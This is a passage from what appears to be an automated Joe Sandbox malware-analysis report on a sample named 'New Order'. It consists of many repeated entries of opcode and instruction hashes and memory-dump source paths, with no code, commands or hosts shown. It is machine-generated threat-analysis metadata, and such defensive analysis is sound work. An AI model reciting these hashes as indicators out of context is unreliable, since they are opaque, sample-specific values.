                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction ID: 71ed6a15bad6baa4d6f91f3ea4b6d83c331ad6e8e934d52b50c462aba193efe9
                                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction Fuzzy Hash: 80413931A00215EBDB21DE2894447BBFB72EFA0754F15806EEE49DB344E6368E80CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d80906eccd9d0744b762d255277d1ca9caa2574f27fb7de91730944f90fda57c
                                                                                                                              • Instruction ID: 474846c45a222cf07ff1dad92baddd5fd1b8ac3ddac62940a6ea4b9183763d4d
                                                                                                                              • Opcode Fuzzy Hash: d80906eccd9d0744b762d255277d1ca9caa2574f27fb7de91730944f90fda57c
                                                                                                                              • Instruction Fuzzy Hash: E9418E71600709EFD362DF18C840B26BBF5FF54354F20866AE449CB291E770EA41CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction ID: 5a208b1ae0f0ee1cd251b19e7953758ed6591bb4d4463a835590bcaf13b19ab6
                                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction Fuzzy Hash: 63413871A00609EFDB25CF98C980AAABBF9FF58704B14496DE556DB251D330EA44CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: becc3c02a5228aacad308388bead1d9e4bc12906159e988781e5283788e1d427
                                                                                                                              • Instruction ID: ededa6bb355c8fffaab1bf9c1ba6f3955baee0e4cd6633fd2d6e1b6dc11fc67b
                                                                                                                              • Opcode Fuzzy Hash: becc3c02a5228aacad308388bead1d9e4bc12906159e988781e5283788e1d427
                                                                                                                              • Instruction Fuzzy Hash: 6D418C71901709DFCBA2EF28CD44A65B7B2FF44314F24826DC916DB2A1EB70AB41CB52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5e460855634da394127c07211ca01255cdc24650a56f6027443222dcdbbf8cb6
                                                                                                                              • Instruction ID: 94e087be24b7f3fa309f4faded1594a10a9e6525cecf099ac66280cdd1fbb0f5
                                                                                                                              • Opcode Fuzzy Hash: 5e460855634da394127c07211ca01255cdc24650a56f6027443222dcdbbf8cb6
                                                                                                                              • Instruction Fuzzy Hash: 5A3199B2A00345DFDB11CF68C040B99BBF0FB49724F2581AED519EB251D3769A02CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a178f04b11f6a711cdc35b8caf9b55f5a576a447cb2467c6f7a031feda50e48f
                                                                                                                              • Instruction ID: 840124fc6e4bfd73ccab0cb86591177c7dd3ab0444b2fae14305f562b3f752b7
                                                                                                                              • Opcode Fuzzy Hash: a178f04b11f6a711cdc35b8caf9b55f5a576a447cb2467c6f7a031feda50e48f
                                                                                                                              • Instruction Fuzzy Hash: A7418DB15183059FD320EF29C845B9BBBE8FF88754F004A2EF598D7251DB709A44CB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4ae30bd78418ba7af123080e6b15459d4d229fe394423e67675018a9b5bb7728
                                                                                                                              • Instruction ID: c6dc899456f08a9b99d110ac811d138804dbbf32deeeb720855be8283f5b4976
                                                                                                                              • Opcode Fuzzy Hash: 4ae30bd78418ba7af123080e6b15459d4d229fe394423e67675018a9b5bb7728
                                                                                                                              • Instruction Fuzzy Hash: D041A2726087469FD320EF6CC840A6AB7E9FFC8704F144619F994D7680E730EA09C7A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 02b5d9a0b174f0afe2bdad0e74c626aade8d29459e4d8a288238aaeb3642091e
                                                                                                                              • Instruction ID: a5cc6b22496805f1b9963d6e8dc4fe3ecf712370a9ab593c21aa8e3671eaa058
                                                                                                                              • Opcode Fuzzy Hash: 02b5d9a0b174f0afe2bdad0e74c626aade8d29459e4d8a288238aaeb3642091e
                                                                                                                              • Instruction Fuzzy Hash: A24191716443098FD766DF1CDC84B26BBAAAF80354F14457DE645C72E1D730DA41CB51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                              • Instruction ID: f6c25ac77bc0ee426caa4046d7c7c4364db400f6b3f3687b98a6f68b53ce81ec
                                                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                              • Instruction Fuzzy Hash: FD311832A04248AFDB228B6CCC40B9FBFEDAF14354F044565F855D739AC6749A84CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eba3d89ee8150931152e5d65ffc13a51ad25a1b1c553cd7c565c175fdb22c3ca
                                                                                                                              • Instruction ID: f2019904e37eafffa0b57b059864731e70758578bbd8acc658aefd020d3bf51d
                                                                                                                              • Opcode Fuzzy Hash: eba3d89ee8150931152e5d65ffc13a51ad25a1b1c553cd7c565c175fdb22c3ca
                                                                                                                              • Instruction Fuzzy Hash: 0731BC35741716ABE7229F598C81FAB76FCAF59B50F400428FA00EB291DAA4DE01C7D1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 48512530463702a05da66cffb8e762abeda625857b99c3e2224ed55845aa5257
                                                                                                                              • Instruction ID: 7d929c25758a559527d2c68ea375e2fa0e17ddb0653edbe4c3330e62800ab07d
                                                                                                                              • Opcode Fuzzy Hash: 48512530463702a05da66cffb8e762abeda625857b99c3e2224ed55845aa5257
                                                                                                                              • Instruction Fuzzy Hash: A5318E326052018FC321DF1DD8D1EA6B7E6FB84760F29446DE996CB356EB31AA40CF91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7901c952d4d1f383a7a847ca6851e48691d17c1658b32fe67dd32fee3117d681
                                                                                                                              • Instruction ID: 91b84fe26c94869200a638259e9f3a02ecaed66ec54a4bf14b15f5ee3e9467d9
                                                                                                                              • Opcode Fuzzy Hash: 7901c952d4d1f383a7a847ca6851e48691d17c1658b32fe67dd32fee3117d681
                                                                                                                              • Instruction Fuzzy Hash: 8241BE71200B499FC763CF68C880F96BBE9AF45714F11882DE699CB390C734EA04CB50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f8f872cbd6ac8b42ac64ab2cfdd144c8031196baa0ebf438432647302c15bbfa
                                                                                                                              • Instruction ID: 4bed1b94a0a76fc47ac860e9767e21e49b010f604e81c7f00ecaa1c5da3fc4d2
                                                                                                                              • Opcode Fuzzy Hash: f8f872cbd6ac8b42ac64ab2cfdd144c8031196baa0ebf438432647302c15bbfa
                                                                                                                              • Instruction Fuzzy Hash: BD317E716042018FD320DF28C8D1EAAB7E5FB84B10F19456DF996DB396E730EA04CB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4d75d6e5ff732442e4abfa0bff5552354857cc722f65a389a12c83b0d11eeea7
                                                                                                                              • Instruction ID: f866d108f460ad35062c6aa8b339e0bc2c5466c9ab01840ccaf8f6f5cc3aed35
                                                                                                                              • Opcode Fuzzy Hash: 4d75d6e5ff732442e4abfa0bff5552354857cc722f65a389a12c83b0d11eeea7
                                                                                                                              • Instruction Fuzzy Hash: 9C31D1323016869BF326976CCE48B257FD9BB51B44F1D00E0AF85EB6D2DB28DA41C231
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b59c5d7356a8e04f7404bc26dfb2c3b943d5f64a6e99340e271aca5cc8011c17
                                                                                                                              • Instruction ID: 686a390b3f6e7387c7f7b9efe84a63a2f462a19d6e272efcfa350570d6bc54d4
                                                                                                                              • Opcode Fuzzy Hash: b59c5d7356a8e04f7404bc26dfb2c3b943d5f64a6e99340e271aca5cc8011c17
                                                                                                                              • Instruction Fuzzy Hash: 1E319276A0015AABDB15DF98C840FAEB7B6EB48B40F554169E900EB344E770EE41CB94
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d4a8d71f21a3c4d11d0f36f1f43dd2a7e5e2db7426155d06d737d73f23d555a0
                                                                                                                              • Instruction ID: 68c9cbd8e6677cf3fb59429f8055593c61eeb455b4a99c2d7e9b57eb39e02219
                                                                                                                              • Opcode Fuzzy Hash: d4a8d71f21a3c4d11d0f36f1f43dd2a7e5e2db7426155d06d737d73f23d555a0
                                                                                                                              • Instruction Fuzzy Hash: 28315576A4112DABDF21DF58DC44BDEBBB9AB98310F1800A5A508E7260DB70DF918F91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3cee64466b2c22ee4475540f9a0851e61d13c1f40c88dfb552fa1e076fda3ec7
                                                                                                                              • Instruction ID: bd07f52f406440d20e70e0ad9c851a97053a9fb720fddd8e3edb60565feb21df
                                                                                                                              • Opcode Fuzzy Hash: 3cee64466b2c22ee4475540f9a0851e61d13c1f40c88dfb552fa1e076fda3ec7
                                                                                                                              • Instruction Fuzzy Hash: FF31C772E00229AFDB22DFADCC40AAEBBF9EF58750F114425E915E7250D6709F408BA5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: db69dc7b5f8886334202a3260152f6f7a4952192c3d79d5347f9d1c1626b9300
                                                                                                                              • Instruction ID: 2d9ff91305990e09682fd732953c73ba1422bc555c794287b0807bfbe0a60544
                                                                                                                              • Opcode Fuzzy Hash: db69dc7b5f8886334202a3260152f6f7a4952192c3d79d5347f9d1c1626b9300
                                                                                                                              • Instruction Fuzzy Hash: A831D872600A06EFD7129F5DC890B6A77B9AF94B54F20407EE505EB342EA30DF018B91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2073290d70633e838a502545364864290bd24d4f2ebcd8dfdf04624e4443e5c3
                                                                                                                              • Instruction ID: 490a841c976fcaf7c6f9a52a38bd33c8faf04576718cb0253aceeecbc42b0845
                                                                                                                              • Opcode Fuzzy Hash: 2073290d70633e838a502545364864290bd24d4f2ebcd8dfdf04624e4443e5c3
                                                                                                                              • Instruction Fuzzy Hash: F231AF72A0461A9BC753DE288C80A6BBBA5BB943A0F014529FD59D7391DA30DF1187E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0a5ee1d302a4c73d76d0b6eb8ab621c5f9989a3f69266b2d2a89765ed8a5f5aa
                                                                                                                              • Instruction ID: 8e14669f1835454d99253958ff7043624aef5de7cb33b5d2df1fad4205b7feaa
                                                                                                                              • Opcode Fuzzy Hash: 0a5ee1d302a4c73d76d0b6eb8ab621c5f9989a3f69266b2d2a89765ed8a5f5aa
                                                                                                                              • Instruction Fuzzy Hash: 09319E71A093018FE761CF19C840B1ABBEAFB88700F0549ADF984D7391D771EA44CB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                              • Instruction ID: 934c382b8d6d1617874aa4d387498140bd62812861a89fa833e44f7a60b7e0c1
                                                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                              • Instruction Fuzzy Hash: C0312E72B04B01AFE765CF6DDD81B57BBF8AB48B50F18452DA5DAC3650E630EA008B90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0dea94fdde52f051d622b0d8a7082fc9c346fc5ac579d70ef876f7742d1a64cb
                                                                                                                              • Instruction ID: 8cc970b11bb21e4b238509105682605149b779d73d51fe78da75d69657683479
                                                                                                                              • Opcode Fuzzy Hash: 0dea94fdde52f051d622b0d8a7082fc9c346fc5ac579d70ef876f7742d1a64cb
                                                                                                                              • Instruction Fuzzy Hash: ED317A715153028FCB11EF19C58095ABBF6FF89318F444AAEE588DB351E331AA44CB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1b19f70a9fcf7b4bc5e3efad5442966f23773c278ef2ec2e2c65c9d81dec7f70
                                                                                                                              • Instruction ID: a8ebc43b4140b7bf132e704d450ec801c4d5dbde28906e7e6dd2d037059d328c
                                                                                                                              • Opcode Fuzzy Hash: 1b19f70a9fcf7b4bc5e3efad5442966f23773c278ef2ec2e2c65c9d81dec7f70
                                                                                                                              • Instruction Fuzzy Hash: 5531F432B116159FD721DFA8C980E6EBBF9AF80308F108529D106D3255E730DF81CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                              • Instruction ID: abd0c50a36f36d2a23c02331af114cddcee7b5b6e7807aab3a593bdfb834d42c
                                                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                              • Instruction Fuzzy Hash: 62210136E4025EAADB119BB98851BEFFBB9EF14740F0581799E15EB340E270CA00C7A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6fe9cb915c7f8ee7770962ef2d691cd4f162b0d427146b4fc07ab423a0504f08
                                                                                                                              • Instruction ID: 74dda1e0507eeebbc97949257edf7e2f19229ceae7fbbb352382ec113011ebea
                                                                                                                              • Opcode Fuzzy Hash: 6fe9cb915c7f8ee7770962ef2d691cd4f162b0d427146b4fc07ab423a0504f08
                                                                                                                              • Instruction Fuzzy Hash: D03129B25002018BDB71AF5CCC40BA977B4EF50314F5482A9DD45DB386EA349B82CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                              • Instruction ID: f880e310b61daa20beccb98b555599819289a62644f7c51e01f560236c3d768e
                                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                              • Instruction Fuzzy Hash: E6212D3A600A5677CB15AB9988C0AFBBFB4EF40710F40841AFA55C7751E739DB40C3A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: be4c330c339d2bb6d6f5bc98e51e22fbc68af573c6c8788cd3357c179dc3413e
                                                                                                                              • Instruction ID: 2cea2628532c7f97caf0196ab72f5b903d5d698aa595f7c4395edc20b281806a
                                                                                                                              • Opcode Fuzzy Hash: be4c330c339d2bb6d6f5bc98e51e22fbc68af573c6c8788cd3357c179dc3413e
                                                                                                                              • Instruction Fuzzy Hash: CC31C432A0051C9BDB319F18CC41FEEB7B9AB15750F0200A9F745E72A0DA749E808F91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                              • Instruction ID: 12dfdd773e712d4748a653fe83285e7216587e34567150b8597a3f21930956f6
                                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                              • Instruction Fuzzy Hash: 48217136A00609EBDB15CF58C980A8EBBB5FF88714F1480A9EE15DB241E671EF059B90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8912e681535670918d765cb1bc9f11f43970801575ce2c36d467b4bb16a15cf3
                                                                                                                              • Instruction ID: 592dc512907959410f4b8569cab29623277be77f72eb09a77e1739844986caa3
                                                                                                                              • Opcode Fuzzy Hash: 8912e681535670918d765cb1bc9f11f43970801575ce2c36d467b4bb16a15cf3
                                                                                                                              • Instruction Fuzzy Hash: 09218172A047559BC722DF18C840B6B7BE4FF88760F054519FD55DB681D730EA018BE2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                              • Instruction ID: 7ee46cdaace5dee588fd72bc49c4e8d3c17030efebfbc295ca88e2bc15fda99c
                                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                              • Instruction Fuzzy Hash: DA316931600605EFE721CB68C884F6AB7F9EF45354F1145A9EA52CB3A0EB34EE02CB51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 32d6c1322cb10b6bf528e294be3fd38fcc061e1b68ab2b71fa78054ccde668a1
                                                                                                                              • Instruction ID: c9ccd530f5eaf27e0ca137e8626ad4379d0e720581b34522e9f260d4227bf6d0
                                                                                                                              • Opcode Fuzzy Hash: 32d6c1322cb10b6bf528e294be3fd38fcc061e1b68ab2b71fa78054ccde668a1
                                                                                                                              • Instruction Fuzzy Hash: 6C317C75A00209DFCB14DF1CC8849AEB7B6FF88314B254599E809DB3A1EB71EB50CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3c62c0accdff844aa0c19e17b32282d11ad4999d034a3acb1e707a25d7282464
                                                                                                                              • Instruction ID: f892839d9e1887339d833b9f6bb8f388573df645a61449fbdbbab1d17454aabb
                                                                                                                              • Opcode Fuzzy Hash: 3c62c0accdff844aa0c19e17b32282d11ad4999d034a3acb1e707a25d7282464
                                                                                                                              • Instruction Fuzzy Hash: 2A2191769006299BCF10EF59C881ABEB7F8FF48740B554069F941E7244D739AE41CFA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
